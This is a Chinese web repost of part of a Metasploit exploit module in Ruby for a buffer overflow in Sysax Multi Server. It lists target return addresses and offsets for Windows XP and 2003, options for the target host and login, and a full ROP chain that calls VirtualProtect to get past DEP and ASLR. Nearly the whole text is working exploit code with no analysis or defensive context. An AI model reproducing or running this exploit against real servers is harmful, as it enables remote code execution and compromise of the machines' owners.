Sysax Multi Server函数缓冲区溢出漏洞(2)

'Targets'       =>
                [
                    [ 'Windows XP SP3',
                        {
                            'Rop'       =>   false,
                            'Ret'       =>   0x77c35459, # push esp #  ret [sysaxd.exe]
                            'Offset'    =>   701,
                        }
                    ],
                    [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
                        {
                            'Rop'       =>   true,
                            'Ret'       =>   0x77baf605, # pivot
                            'Offset'    =>   701,
                            'Nop'       =>   0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                        }
                    ],
                ],
            'Privileged'    => false,
            'DisclosureDate'=> 'July 29, 2012',
            'DefaultTarget' => 0))

register_options(
                [
                    OptString.new('URI', [false, "URI for Multi Server", '/']),
                    Opt::RPORT(80),
                    OptString.new('SysaxUSER', [ true, "Username" ]),
                    OptString.new('SysaxPASS', [ true, "Password" ])
                ], self.class)
        
    end

def target_url
        "http://#{rhost}:#{rport}#{datastore['URI']}"
    end

def create_rop_chain()
        rop_gadgets = []
        # All rop gadgets generated by mona.py
        # Thanks corelanc0d3r for making such a great tool

if (target == targets[1]) # Windows 2003
            rop_gadgets =
            [
                0x77be3adb, # POP EAX # RETN [msvcrt.dll]
                0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
                0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
                0x41414141, # Filler (compensate)
                0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
                0x77bdb896, # POP EBP # RETN [msvcrt.dll]
                0x77be2265, # & push esp #  ret  [msvcrt.dll]
                0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
                0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
                0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
                0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
                0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
                0x77befbb4, # &Writable location [msvcrt.dll]
                0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
                0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
                0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
                0x90909090, # nop
                0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
            ].flatten.pack("V*")
        end

return rop_gadgets

end

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wypfpj.html